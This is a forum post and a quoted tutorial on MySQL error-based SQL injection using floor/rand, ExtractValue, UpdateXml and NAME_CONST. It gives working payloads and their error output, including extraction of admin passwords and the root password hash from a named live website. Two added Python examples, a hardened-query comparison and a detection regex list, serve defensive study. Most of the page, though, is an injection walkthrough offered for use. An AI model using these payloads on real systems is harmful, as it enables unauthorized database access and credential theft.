中国网络渗透测试联盟

Title: MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Author: admin    Time: 2015-11-11 19:03

1. Triggering an error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is dumped in the error message. To query other data, modify the subquery in the position where version() sits.
For example, to query the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


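As an added example (not code from the original post), here is the page's `select * from article where id = ...` lookup written with the two defects that all three error modes above rely on, next to a hardened version. It assumes Python with sqlite3 standing in for MySQL (so the engine's error text differs), with the article row and the ExtractValue payload taken from the page.

```python
import sqlite3

# Constructed stand-in for the page's "article" table (id, title, content).
# sqlite3 is used instead of MySQL so the example runs offline; extractvalue()
# does not exist in SQLite, but the two defects shown are the same.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT, content TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    return conn

def get_article_vulnerable(conn, user_id):
    # Defect 1: the id parameter is concatenated into the SQL text, so an input
    # like "1 and extractvalue(...)" becomes part of the statement.
    # Defect 2: the raw database error is returned to the client. That error
    # text is the channel every error-based technique on this page reads from.
    try:
        rows = conn.execute(
            "SELECT * FROM article WHERE id = " + user_id).fetchall()
        return {"rows": rows}
    except sqlite3.Error as e:
        return {"error": str(e)}

def get_article_hardened(conn, user_id):
    # Fix 1: validate the type, then bind it as a parameter; the value can
    # never be parsed as SQL, whatever it contains.
    if not user_id.isdigit():
        return {"error": "invalid id"}
    try:
        rows = conn.execute(
            "SELECT * FROM article WHERE id = ?", (int(user_id),)).fetchall()
        return {"rows": rows}
    except sqlite3.Error as e:
        # Fix 2: keep the detail server-side and return a generic message,
        # so a probe learns nothing from the response.
        print("db error (logged, not returned):", e)
        return {"error": "internal error"}

# Payload from the page's ExtractValue section, used as the id input.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"

if __name__ == "__main__":
    db = setup_db()
    print(get_article_vulnerable(db, PAYLOAD))  # leaks the engine's error text
    print(get_article_hardened(db, PAYLOAD))    # {'error': 'invalid id'}
```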

Additional collected examples:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
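The following detector is an added example, not code from the post or from the tutorial it quotes. It flags the four error-based patterns covered on this page (floor/rand with group by, ExtractValue, UpdateXml and NAME_CONST) in decoded request URIs, and checks whether a response body echoes the MySQL error strings these probes read their data from; the sample requests are constructed from the page's own payloads.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four error-based techniques on this page, matched
# against the decoded request (case-insensitive, whitespace-tolerant).
SIGNATURES = {
    "floor_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)[\s\S]*?group\s+by", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# Error texts these techniques depend on seeing in the HTTP response body.
LEAK_PATTERNS = re.compile(
    r"Duplicate entry '.*' for key|XPATH syntax error|Duplicate column name", re.I)

def classify_request(raw_uri):
    """Return the names of the techniques matching one request URI.
    The URI is decoded first because payloads usually arrive with '+' for
    spaces and %xx escapes, as in the tutorial's examples."""
    decoded = unquote_plus(raw_uri)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def response_leaks_db_error(body):
    """True if a response body carries a MySQL error string that an
    error-based probe could read data out of."""
    return LEAK_PATTERNS.search(body) is not None

# Constructed request URIs, modelled on the page's examples (not real traffic).
SAMPLE_REQUESTS = [
    "/detail.php?id=1",
    "/detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--",
    "/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))",
    "/detail.php?id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
]

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(classify_request(uri), uri[:60])
```

A request that matches and a response that leaks, seen together, is the pairing worth alerting on; either alone is a weaker signal.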